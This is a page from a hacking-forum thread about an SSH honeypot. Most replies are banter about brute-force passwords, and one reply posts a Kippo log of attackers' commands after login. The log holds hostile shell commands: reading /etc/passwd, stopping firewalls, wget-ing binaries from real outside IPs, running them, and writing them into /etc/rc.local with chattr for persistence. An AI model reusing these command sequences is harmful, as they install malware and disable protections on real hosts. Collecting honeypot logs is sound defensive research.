Pages: 1 [2] 3

Author Topic: 1 day of running a SSH honeypot  (Read 6186 times)

0 Members and 1 Guest are viewing this topic.

Offline Darkvision

  • EZ's Fluffer
  • VIP
  • Royal Highness
  • *
  • Posts: 755
  • Cookies: 149
  • Its not a bug, It's a Chilopodas.
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #15 on: September 17, 2014, 09:54:26 pm »
chapp i wasnt saying he was trying to brute force the login, i was talking about the absurdity of trying to use a 19 digit "word" that isnt a default password hoping to get a "lucky" guess. since the idea of these kind of bots is to automate getting into as many places as possible using something that has virtually no chance of ever doing so is a big head scratcher. To put it another way, you could replace that entry with any randomly generated 16 digit word and still have a far greater(and still insanely small) chance of randomly getting access, or better yet with say a 8 digit  string, and have a "decent(in relative terms)" but small chance. Since this isnt brute force and "random" strings, any actual word would have be far more likely to work. So yes he can disregard it as a chance to work at random. It has no place as a "random" dictionary word, which was my original point. That being said it very well could be placed with intent trying to get access to something still set up with a default password, maybe its a troll password just to make a sysadmin scratch their head at his word list, maybe its the universal code for infinite lives.(my money is on the last one) Anyway hope that clears things up
Report to moderator   Logged
The internet: where men are men, women are men, and children are FBI agents.

Quote from: Xires on August 02, 2013, 07:14:21 pm
Ahh, EvilZone.  Where networking certification meets avian fecal matter & all is explained, for better or worse.

<Phage> I used an entrence I never use

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #16 on: September 18, 2014, 05:24:11 am »
We are getting off topic here my bitches and hoes. Let's get back on track.
Report to moderator   Logged
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline HTH

  • Official EZ Slut
  • Administrator
  • Knight
  • *
  • Posts: 395
  • Cookies: 158
  • EZ Titan
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #17 on: September 18, 2014, 06:01:13 am »
Most of the login attempts I see aren't totally retarded passwords. Lots are actually decent, I lol'd that your pw was 123456 btw. Anyway.. What I find peculiar is actually the first five login attempts...
Dude tries one pwd, doesnt work
Tries another, works!
Half an hour break...
Dude in same general area (possibly first person after poop? router goes down? who knows) then comes in
tries the EXACT same first try as the first guy (not bad odds given the password but still, with the first three bytes of the IP address being the same and all..)
Then is succesful...
Then CONTINUES to try passwords! hahaha Noob who didnt set up his tool properly?

What do ya guys think?
Report to moderator   Logged
<ande> HTH is love, HTH is life
<TurboBorland> hth is the only person on this server I can say would successfully spitefuck peoples women

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #18 on: September 18, 2014, 07:03:08 pm »
Maybe he successfully logged in but then suddenly thought: "This shit is illlegal! I should spoof my IP." So he used a proxy that was three blocks from his house and then tried again, feeling absolutely sure he was 100% pure anonymous

EDIT: In reality, I'm betting that person had a dynamic IP and it changed at the beginning of the logs.

Also, maybe he wrote that tool himself, and instead of scanning a random range like he thought it would, it just keeps trying one IP address no matter what.
« Last Edit: September 18, 2014, 07:06:13 pm by lucid »
Report to moderator   Logged
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #19 on: September 18, 2014, 08:07:04 pm »
Quote from: lucid on September 18, 2014, 07:03:08 pm
Maybe he successfully logged in but then suddenly thought: "This shit is illlegal! I should spoof my IP." So he used a proxy that was three blocks from his house and then tried again, feeling absolutely sure he was 100% pure anonymous

EDIT: In reality, I'm betting that person had a dynamic IP and it changed at the beginning of the logs.

Also, maybe he wrote that tool himself, and instead of scanning a random range like he thought it would, it just keeps trying one IP address no matter what.
Well I checked some of those IP's they are blacklisted for scanning,bruteforce etc
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #20 on: September 18, 2014, 08:33:15 pm »
Just for shits and giggles: Since 8th of december 2013 till now EZ has gotten 168 176 SSH connection attempts.
Report to moderator   Logged
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline chapp

  • Peasant
  • *
  • Posts: 87
  • Cookies: 2
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #21 on: September 19, 2014, 12:30:42 pm »
Quote from: ande on September 18, 2014, 08:33:15 pm
Just for shits and giggles: Since 8th of december 2013 till now EZ has gotten 168 176 SSH connection attempts.
But any successful logins from unknown parties ;)?
Report to moderator   Logged

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: 1 day of running a SSH honeypot
« Reply #22 on: September 19, 2014, 04:02:35 pm »
Obviously not...
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #23 on: September 25, 2014, 01:23:18 pm »
Quote from: cwer on September 25, 2014, 01:04:17 pm
You wouldn't need to scan every IPv4 address, you could skip the private ranges (eg. 192.168.0.0/16, etc), and depending on the target, certain organizations and foreign countries. Looking at this map of IPv4 addresses from March '14, you could skip a good amount of the IPv4 address space that's not even being used. There are a lot of unallocated and unrouted blocks, and some of the used blocks look like they're barely allocated. Most of the used addresses won't even be running a SSHD, so I don't think it would take too long.
Even if it cuts in half, you have a point but it is still higly unlikely.
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline nozzlechunks

  • Serf
  • *
  • Posts: 22
  • Cookies: -3
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #24 on: June 23, 2015, 09:04:02 pm »
Necropost, at Proxx's suggestion.

Here's some honeypot logs containing post log-in activity. I was running Kippo with the fake shell environment. What you see, generally, is scripted activity, and it's by the numbers. Show up, look for passwords, then try to turn off the firewall via iptables and pull down files. None of the files were pulled down, of course, but I was able to hit a few of the download IPs and pull down that and more because they left directory traversal on.

Some interesting callouts... there are a number of techniques used to turn off the firewall, from IP Tables, all the way down to commands specific to certain NIX distros. Also, some of them actually tried to pull down distros to install on my box.

It took a while to find this, but I think I have more logs lying around. I'm also gonna' be playing with more honeypots later this summer, so I anticipate more to share.

Thanks for looking!

*Note, the long string is the session ID, so you can see every event that occurs in a particular session.


Code: [Select]
1,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:46",\N,1,"ls"
2,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:48",\N,1,"whoami"
3,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:53",\N,1,"cat /etc/pa"
4,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:57",\N,1,"cat /etc/passwd"
5,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:27:00",\N,1,"exit"
6,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:15",\N,1,"ls"
7,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:16",\N,1,"exit"
8,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:28",\N,1,"cat /etc/passwd"
9,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:30",\N,1,"exit"
10,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:31",\N,0,"quit"
11,"3a11f5444bc111e4b273024542c06214","2014-10-04 12:23:26",\N,1,"echo \"WinSCP: this is end-of-file:0\""
12,"486114e04bc111e4b273024542c06214","2014-10-04 12:23:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
13,"5dd168204bc111e4b273024542c06214","2014-10-04 12:24:25",\N,1,"echo \"WinSCP: this is end-of-file:0\""
14,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:02",\N,1,"ls"
15,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:10",\N,1,"uname -a"
16,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:22",\N,0,"http://120.24.62.114:8989/txma"
17,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:30",\N,0,"http://120.24.62.114:8989/txma"
18,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:35",\N,1,"wget http://120.24.62.114:8989/txma"
19,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:44",\N,0,"service iptables stop"
20,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:03",\N,1,"wget http://120.24.62.114:8989/txma"
21,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:38",\N,1,"ls"
22,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:06",\N,1,"wget http://120.24.62.114:8989/txma"
23,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:16",\N,1,"uname -a"
24,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:52:45",\N,0,"http://120.24.62.114:8989/qqwwqqww"
25,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:53:13",\N,0,"service iptables stop"
26,"307e51b44caf11e4b3d002b6d5d64ab8","2014-10-05 16:46:57",\N,1,"uname -a"
27,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:17",\N,0,"/etc/init.d/iptables stop"
28,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:21",\N,0,"service iptables stop"
29,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:25",\N,0,"SuSEfirewall2 stop"
30,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:29",\N,0,"reSuSEfirewall2 stop"
31,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:33",\N,1,"cd /tmp"
32,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:37",\N,1,"wget -c http://42.96.191.5:300/dd-wrt"
33,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:41",\N,1,"chmod 777 dd-wrt"
34,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:45",\N,0,"./dd-wrt"
35,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:49",\N,1,"wget -c http://42.96.191.5:300/Linux2.4"
36,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:53",\N,1,"chmod 777 Linux2.4"
37,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:57",\N,0,"./Linux2.4"
38,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:01",\N,1,"wget -c http://42.96.191.5:300/Linux2.6"
39,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:05",\N,1,"chmod 777 Linux2.6"
40,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:09",\N,0,"./Linux2.6"
41,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:13",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
42,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:17",\N,1,"chmod 777 linux-arm"
43,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:21",\N,0,"./linux-arm"
44,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:25",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
45,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:29",\N,1,"chmod 777 linux-mips"
46,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:33",\N,0,"./linux-mips"
47,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:11",\N,0,"/etc/init.d/iptables stop"
48,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:15",\N,0,"service iptables stop"
49,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:19",\N,0,"SuSEfirewall2 stop"
50,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:23",\N,0,"reSuSEfirewall2 stop"
51,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:27",\N,1,"cd /tmp"
52,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:31",\N,1,"wget -c http://42.96.191.5:300/G32"
53,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:35",\N,1,"chmod 0755 /tmp/G32"
54,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:39",\N,0,"./G32 &"
55,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:43",\N,1,"wget -c http://42.96.191.5:300/G64"
56,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:47",\N,1,"chmod 0755 /tmp/G64"
57,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:51",\N,0,"./G64 &"
58,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:55",\N,1,"wget -c http://42.96.191.5:300/FreeBsd"
59,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:59",\N,1,"chmod 0755 /tmp/FreeBsd"
60,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:03",\N,0,"./FreeBsd &"
61,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:07",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
62,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:11",\N,1,"chmod 0755 /tmp/linux-arm"
63,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:15",\N,0,"./linux-arm &"
64,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:19",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
65,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:23",\N,1,"chmod 0755 /tmp/linux-mips"
66,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:27",\N,0,"./linux-mips &"
67,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:45",\N,1,"wget http://117.21.173.140:7000/lele"
68,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:49",\N,1,"wget http://117.21.173.140:7000/lele"
69,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:30",\N,0,"service iptables stop"
70,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:37",\N,1,"wget wget http://222.186.34.123:123/1995xxoo"
71,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:44",\N,1,"chmod u+x 1995xxoo"
72,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:51",\N,0,"./1995xxoo &"
73,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:58",\N,1,"wget http://222.186.34.123:123/xxoo1995"
74,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:05",\N,1,"chmod u+x xxoo1995"
75,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:12",\N,0,"./xxoo1995 &"
76,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:19",\N,1,"cd /tmp"
77,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
78,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:33",\N,1,"echo \"./1995xxoo\">>/etc/rc.local"
79,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:40",\N,1,"echo \"./xxoo1995&\">>/etc/rc.local"
80,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
81,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:01",\N,0,"service iptables stop"
82,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:08",\N,1,"wget http://222.186.34.123:123/rrmr"
83,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:15",\N,1,"chmod u+x rrmr"
84,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:22",\N,0,"./rrmr &"
85,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:29",\N,1,"wget http://222.186.34.123:123/mmrr"
86,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:36",\N,1,"chmod u+x mmrr"
87,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:43",\N,0,"./mmrr &"
88,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:50",\N,1,"wget http://222.186.34.123:123/qgg"
89,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:57",\N,1,"chmod u+x qgg"
90,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:04",\N,0,"./qgg &"
91,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:11",\N,1,"cd /tmp"
92,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:18",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
93,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:25",\N,1,"echo \"./rrmr\">>/etc/rc.local"
94,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:32",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
95,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:39",\N,1,"echo \"./qgg&\">>/etc/rc.local"
96,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:46",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
97,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:13",\N,0,"service iptables stop"
98,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:20",\N,1,"wget http://222.186.34.123:123/rrmr"
99,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:27",\N,1,"chmod u+x rrmr"
100,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:34",\N,0,"./rrmr &"
101,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:41",\N,1,"wget http://222.186.34.123:123/mmrr"
102,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:48",\N,1,"chmod u+x mmrr"
103,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:55",\N,0,"./mmrr &"
104,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:02",\N,1,"wget http://222.186.34.123:123/qgg"
105,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:09",\N,1,"chmod u+x qgg"
106,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:16",\N,0,"./qgg &"
107,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:23",\N,1,"cd /tmp"
108,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:30",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
109,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:37",\N,1,"echo \"./rrmr\">>/etc/rc.local"
110,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:44",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
111,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:51",\N,1,"echo \"./qgg&\">>/etc/rc.local"
112,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
113,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:31",\N,1,"wget http://118.244.150.49:8889/ooxx59"
114,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:38",\N,1,"chmod +x ooxx59"
115,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:45",\N,0,"./ooxx59"
116,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:52",\N,1,"chattr +i ooxx59"
117,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:59",\N,1,"wget http://118.244.150.49:8889/ooxx95"
118,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:06",\N,1,"chmod +x ooxx95"
119,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:13",\N,0,"./ooxx95"
120,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:20",\N,1,"chattr +i ooxx95"
121,"7d478f0c5eba11e4b3d002b6d5d64ab8","2014-10-28 15:53:22",\N,1,"uname -a"
122,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:01",\N,0,"service iptables stop"
123,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:08",\N,1,"wget http://222.186.34.120:8899/ttz32"
124,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:14",\N,1,"chmod u+x ttz32"
125,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:20",\N,0,"./ttz32 &"
126,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:26",\N,1,"cd /tmp"
127,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:32",\N,1,"wget http://222.186.34.120:8899/ttz24"
128,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:38",\N,1,"chmod u+x ttz24"
129,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:44",\N,0,"./ttz24 &"
130,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:50",\N,1,"cd /tmp"
131,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:56",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
132,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:02",\N,1,"echo \"./ttz32&\">>/etc/rc.local"
133,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:08",\N,1,"echo \"./ttz24&\">>/etc/rc.local"
134,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
135,"edefd36a65c011e4b273024542c06214","2014-11-06 14:26:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
136,"39265708667c11e4b273024542c06214","2014-11-07 12:47:47",\N,1,"uname -a"
137,"b8065b4266a711e482800254c1a985ea","2014-11-07 17:58:57",\N,1,"wget http://204.44.104.93:8080/iten32"
138,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:51",\N,0,"/etc/init.d/iptables stop"
139,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:55",\N,1,"wget http://204.44.104.93:8080/iten32"
140,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:59",\N,1,"chmod 0755 iten32"
141,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:03",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
142,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:07",\N,1,"wget http://204.44.104.93:8080/iten64"
143,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:11",\N,1,"chmod 0755 iten64"
144,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:15",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
145,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:06",\N,0,"/etc/init.d/iptables stop"
146,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:16",\N,1,"wget http://204.44.104.93:8080/iten32"
147,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:26",\N,1,"chmod 0755 iten32"
148,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:36",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
149,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:46",\N,1,"wget http://204.44.104.93:8080/iten64"
150,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:56",\N,1,"chmod 0755 iten64"
151,"2300244e672211e482800254c1a985ea","2014-11-08 08:36:06",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
152,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:40",\N,0,"/etc/init.d/iptables stop"
153,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:50",\N,1,"wget http://204.44.104.93:8080/iten32"
154,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:00",\N,1,"chmod 0755 iten32"
155,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:10",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
156,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:20",\N,1,"wget http://204.44.104.93:8080/iten64"
157,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:30",\N,1,"chmod 0755 iten64"
158,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:40",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
159,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:30:58",\N,0,"service iptables stop"
160,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:03",\N,1,"wget http://60.169.74.173:8889/ux24"
161,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:08",\N,1,"chmod u+x ux24"
162,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:13",\N,0,"./ux24 &"
163,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:18",\N,1,"cd /tmp"
164,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:23",\N,1,"wget http://60.169.74.173:8889/ux32"
165,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:28",\N,1,"chmod u+x ux32"
166,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:33",\N,0,"./ux32 &"
167,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:38",\N,1,"cd /tmp"
168,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:43",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
169,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:48",\N,1,"echo \"./ux24&\">>/etc/rc.local"
170,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:53",\N,1,"echo \"./ux32&\">>/etc/rc.local"
171,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
172,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:32",\N,0,"service iptables stop"
173,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:38",\N,1,"wget http://60.169.74.173:8889/ha32"
174,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:44",\N,1,"chmod u+x ha32"
175,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:50",\N,0,"./ha32 &"
176,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:56",\N,1,"cd /tmp"
177,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:02",\N,1,"wget http://60.169.74.173:8889/ha24"
178,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:08",\N,1,"chmod u+x ha24"
179,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:14",\N,0,"./ha24 &"
180,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:20",\N,1,"cd /tmp"
181,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
182,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:32",\N,1,"echo \"./ha32&\">>/etc/rc.local"
183,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:38",\N,1,"echo \"./ha24&\">>/etc/rc.local"
184,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:44",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
185,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:35",\N,0,"service iptables stop"
186,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:41",\N,1,"wget http://60.169.79.211:8080/jiuwu"
187,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:47",\N,1,"chmod u+x jiuwu"
188,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:53",\N,0,"./jiuwu &"
189,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:59",\N,1,"cd /tmp"
190,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:05",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
191,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:11",\N,1,"echo \"./jiuwu&\">>/etc/rc.local"
